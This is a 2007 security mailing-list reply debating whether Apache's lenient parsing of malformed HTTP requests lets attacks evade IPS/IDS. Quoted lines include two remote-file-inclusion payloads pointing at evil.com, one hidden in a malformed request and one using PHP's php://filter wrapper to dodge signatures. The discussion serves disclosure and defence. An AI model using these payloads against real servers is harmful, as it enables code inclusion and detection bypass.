Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: IPS Evasion with the Apache HTTP Server
Date: Wed, 20 Jun 2007 17:50:55 +0400

Dear Jamie Riden,

--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to 3APA3A () security nnov ru:

JR> (This is what I gathered from the original posting, but I might be wrong.)

JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,

Original  BreakingPoint  articles  author  refers to says "The intent is
describe  the  strange  behaviors  of network applications". It mentions
neither  of  IPS  products, but IIS and Apache. And at least one case of
Apache  behavior  is  partially  expected  (because  of RFC) and already
described (by Michal Majchrowicz).

JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:

JR> \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n

IPS  may  detect  known attacks. Just like antivirus, you may use IPS to
protected  against known viruses/exploits. An ability to bypass IPS with
new one is not a bug. I do collect different content filtering bypassing


You  simply  MUST  accept  the  risk  there  is always the way to bypass
content  filtering. IPS like doesn't protect your network by itself. IPS
is nothing, but a tool.

JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request"., when it should actually be alerting that a
JR> RFI attempt was made.

In  this  situation IDS/IPS should alert unsupported request attempt was
made and block this attempt in case of IPS.

JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that a RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )

I  can  write  buggy application and attempt to exploit it will never be
detected by existing signatures.

~/ZARAZA http://securityvulns.com/

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]